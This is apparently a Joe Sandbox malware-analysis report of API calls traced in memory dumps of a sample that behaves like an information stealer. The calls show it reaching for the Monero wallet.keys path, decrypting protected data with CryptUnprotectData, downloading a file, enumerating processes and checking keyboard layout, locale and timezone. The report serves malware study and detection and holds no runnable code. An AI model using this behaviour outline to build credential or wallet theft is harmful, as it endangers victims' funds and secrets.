Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: cb19496a0f7a766d466cd7c66f3c0f6cd56d405a15009636cf6db8b2101446d2
Instruction ID: 852b63544c62d64988d1a8582b2c6374d9554a5d232a29326c8d9aace82ee2df
Opcode Fuzzy Hash: cb19496a0f7a766d466cd7c66f3c0f6cd56d405a15009636cf6db8b2101446d2
Instruction Fuzzy Hash: D212DC7191011CABDB19EB60DE96FFE7378AF64304F41459DA10A66091EF306F89CFA2

Function 00AB60A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00ACA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00ACA7E6

Part of subcall function 00AB47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00AB4839
Part of subcall function 00AB47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00AB4849

InternetOpenA.WININET(00AD0DF7,00000001,00000000,00000000,00000000), ref: 00AB610F
StrCmpCA.SHLWAPI(?,005EFB80), ref: 00AB6147
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00AB618F
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00AB61B3
InternetReadFile.WININET(?,?,00000400,?), ref: 00AB61DC
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00AB620A
CloseHandle.KERNEL32(?,?,00000400), ref: 00AB6249
InternetCloseHandle.WININET(?), ref: 00AB6253
InternetCloseHandle.WININET(00000000), ref: 00AB6260

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID:
API String ID: 2507841554-0
Opcode ID: 85133b3ee9ba5870e0250a793684c2e0d2e8888b454fe8fb43a82fcb4724d9fc
Instruction ID: 72aec67ec9a38eaf98ad6055968b0769f567fec37efdb63f26f6ea1d094a6efa
Opcode Fuzzy Hash: 85133b3ee9ba5870e0250a793684c2e0d2e8888b454fe8fb43a82fcb4724d9fc
Instruction Fuzzy Hash: 585181B1A00208ABEF20DF50DD45FEEB7B8FB04705F108199B609A71C1DB746A85CF96

Function 00ABE430 Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 514fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00ACA740: lstrcpy.KERNEL32(00AD0E17,00000000), ref: 00ACA788

Part of subcall function 00ACA920: lstrcpy.KERNEL32(00000000,?), ref: 00ACA972
Part of subcall function 00ACA920: lstrcat.KERNEL32(00000000), ref: 00ACA982

Part of subcall function 00ACA9B0: lstrlen.KERNEL32(?,005E8CA8,?,\Monero\wallet.keys,00AD0E17), ref: 00ACA9C5
Part of subcall function 00ACA9B0: lstrcpy.KERNEL32(00000000), ref: 00ACAA04
Part of subcall function 00ACA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ACAA12

Part of subcall function 00ACA8A0: lstrcpy.KERNEL32(?,00AD0E17), ref: 00ACA905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00AD0D73), ref: 00ABE4A2
StrCmpCA.SHLWAPI(?,00AD14F8), ref: 00ABE4F2
StrCmpCA.SHLWAPI(?,00AD14FC), ref: 00ABE508
FindNextFileA.KERNEL32(000000FF,?), ref: 00ABEBDF

Strings

\*.*, xrefs: 00ABE44D
^, xrefs: 00ABE866

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
String ID: \*.*$^
API String ID: 433455689-1986375421
Opcode ID: 1dba99915f4bdad9a80a6b0c40460184a6747133cd1acfcd71f721dc766e006f
Instruction ID: 9448f025c524c0dcd6e1b475688649f2ebdb6d1cc47046d52fc81dd6ca27f3f7
Opcode Fuzzy Hash: 1dba99915f4bdad9a80a6b0c40460184a6747133cd1acfcd71f721dc766e006f
Instruction Fuzzy Hash: 13122D72A1011CABDB14FB60DE96FFD7338AB64304F4145ADA50AA2191EE346F49CB92

Function 00AC7B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00ACA740: lstrcpy.KERNEL32(00AD0E17,00000000), ref: 00ACA788

GetKeyboardLayoutList.USER32(00000000,00000000,00AD05AF), ref: 00AC7BE1
LocalAlloc.KERNEL32(00000040,?), ref: 00AC7BF9
GetKeyboardLayoutList.USER32(?,00000000), ref: 00AC7C0D
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00AC7C62
LocalFree.KERNEL32(00000000), ref: 00AC7D22

Strings

/ , xrefs: 00AC7C7F

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: f1e4cf803447faa6021eee85c029f009c8b3ff7862cb52be740fc0149d1798b7
Instruction ID: ca72ec777e7406d4eb537aca775a5d0a0be1d43c603349020a49322143c2aca5
Opcode Fuzzy Hash: f1e4cf803447faa6021eee85c029f009c8b3ff7862cb52be740fc0149d1798b7
Instruction Fuzzy Hash: F341287194021CABDB24DB94DD99FFEB3B8FB54704F204199E40AA2291DB742F85CFA1

Function 00AC9600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00AC961E
Process32First.KERNEL32(00AD0ACA,00000128), ref: 00AC9632
Process32Next.KERNEL32(00AD0ACA,00000128), ref: 00AC9647
StrCmpCA.SHLWAPI(?,00000000), ref: 00AC965C
CloseHandle.KERNEL32(00AD0ACA), ref: 00AC967A

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 150b17f27ed4c725552186a8133867c792d5039c4199fef158ad00c48c498131
Instruction ID: 21f6ee50fa0206eecd0aab739dec415d3e68cfe5ec793eaae0436b221ec3a22b
Opcode Fuzzy Hash: 150b17f27ed4c725552186a8133867c792d5039c4199fef158ad00c48c498131
Instruction Fuzzy Hash: 54010CB5A00208EBCB14DFA5CD48FEEB7F9EB48740F104189A90997280DB74AB40CF52

Function 00AC8680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON

Download Yara Rule

APIs

Part of subcall function 00ACA740: lstrcpy.KERNEL32(00AD0E17,00000000), ref: 00ACA788

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00AD05B7), ref: 00AC86CA
Process32First.KERNEL32(?,00000128), ref: 00AC86DE
Process32Next.KERNEL32(?,00000128), ref: 00AC86F3

Part of subcall function 00ACA9B0: lstrlen.KERNEL32(?,005E8CA8,?,\Monero\wallet.keys,00AD0E17), ref: 00ACA9C5
Part of subcall function 00ACA9B0: lstrcpy.KERNEL32(00000000), ref: 00ACAA04
Part of subcall function 00ACA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ACAA12

Part of subcall function 00ACA8A0: lstrcpy.KERNEL32(?,00AD0E17), ref: 00ACA905

CloseHandle.KERNEL32(?), ref: 00AC8761

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 1066202413-0
Opcode ID: 5f04dbbf885cd73f87410858e3ff04963d758f2108f9c087d946dd95d5744d6b
Instruction ID: da7ddb4517abe317d8a533f9ebe7974cb321b698d44a62a3f8e9dd4e3b3c46de
Opcode Fuzzy Hash: 5f04dbbf885cd73f87410858e3ff04963d758f2108f9c087d946dd95d5744d6b
Instruction Fuzzy Hash: 8A3157B1901218ABCB24EB50DD45FEEB778FF54704F1045ADA50AA22A0EF346E45CFA2

Function 00AC7A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,005EF360,00000000,?,00AD0E10,00000000,?,00000000,00000000), ref: 00AC7A63
RtlAllocateHeap.NTDLL(00000000), ref: 00AC7A6A
GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,005EF360,00000000,?,00AD0E10,00000000,?,00000000,00000000,?), ref: 00AC7A7D
wsprintfA.USER32 ref: 00AC7AB7

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateInformationProcessTimeZonewsprintf
String ID:
API String ID: 3317088062-0
Opcode ID: 7eb5ce42495d26a95af3b5e9b25e76d968aeacdec4dddb1c7f6b19c6a70ad040
Instruction ID: 668877a0ff6d890ae88f299853009ffe3db339810d0a7ad87d076e17b038c30a
Opcode Fuzzy Hash: 7eb5ce42495d26a95af3b5e9b25e76d968aeacdec4dddb1c7f6b19c6a70ad040
Instruction Fuzzy Hash: EF118EB1945218EBEB208B54DC49FADB7B8FB04761F10479AE91AA32C0D7741E40CF52

Function 00AB9B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00AB9B84
LocalAlloc.KERNEL32(00000040,00000000), ref: 00AB9BA3
LocalFree.KERNEL32(?), ref: 00AB9BD3

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
